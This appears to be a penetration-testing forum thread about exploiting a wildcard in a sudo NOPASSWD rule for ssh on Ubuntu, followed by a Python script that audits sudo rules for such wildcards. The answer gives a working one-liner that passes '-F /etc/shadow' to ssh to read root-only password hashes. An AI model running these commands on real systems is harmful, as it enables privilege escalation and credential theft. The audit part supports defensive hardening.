2

I'm testing for privilege escalations on an Ubuntu 18.04 host, and after running sudo -l, I've discovered a couple of root NOPASSWD commands for a standard user (w/ unknown password). These commands contain wildcards.

Example: (root) NOPASSWD: /usr/bin/ssh * /path/to/bash/script.sh

I've already attempted to inject root commands, without any luck.

Failed Attempt: /usr/bin/ssh user@localhost "cat /etc/shadow" ; /path/to/bash/script.sh

Is it possible to get command injection in such a case, and get commands to run with sudo privileges?

Any advice is appreciated.

Duck

1 Answer

2

Well, after beating my head against numerous commands, I finally found that I could escape the wildcard and cat out /etc/shadow

...With a little help from this cheat sheet

LFILE=/etc/shadow

Success: sudo /usr/bin/ssh user@localhost -F $LFILE /path/to/bash/script.sh

Hope this helps someone in the future. :) Cheers!

Duck
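An added example, not part of the original question or answer: an audit sketch showing why the rule from the question accepts the answer's command line. sudoers glob-matches the arguments as one joined string, so * also matches spaces and option words such as -F. The `sudo -l` output is constructed, and the second rule and all function names are assumptions made for illustration.

```python
import fnmatch
import re

# Constructed `sudo -l` output. The first rule is the one quoted in the question;
# the second is a hypothetical hardened rule with the arguments spelled out.
SUDO_L = """\
User duck may run the following commands on host:
    (root) NOPASSWD: /usr/bin/ssh * /path/to/bash/script.sh
    (root) NOPASSWD: /usr/bin/ssh user@localhost /path/to/bash/script.sh
"""

RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(/\S+)(?:\s+(.*\S))?\s*$")
GLOB_CHARS = set("*?[")


def parse_rules(text):
    """Return (command, args_pattern) pairs from `sudo -l` style lines."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if m:
            rules.append((m.group(3), m.group(4)))
    return rules


def rule_allows(rule, argv):
    """Approximate sudoers matching: the arguments are joined into one string
    and glob-matched. Simplification: the command path is compared literally."""
    command, pattern = rule
    if argv[0] != command:
        return False
    if pattern is None:  # rule without arguments: any arguments are allowed
        return True
    return fnmatch.fnmatchcase(" ".join(argv[1:]), pattern)


def wildcard_rules(rules):
    """Rules whose argument pattern contains a glob character."""
    return [r for r in rules if r[1] and GLOB_CHARS & set(r[1])]


if __name__ == "__main__":
    rules = parse_rules(SUDO_L)
    # Command line from the answer, with $LFILE already expanded by the shell.
    argv = "/usr/bin/ssh user@localhost -F /etc/shadow /path/to/bash/script.sh".split()
    for rule in rules:
        kind = "WILDCARD" if rule in wildcard_rules(rules) else "exact"
        print(f"{kind:8} allows={rule_allows(rule, argv)}  {rule[0]} {rule[1]}")
```

The wildcard rule reports allows=True for the answer's command line, while the rule with explicit arguments reports allows=False, which is the case for listing exact arguments in sudoers instead of *.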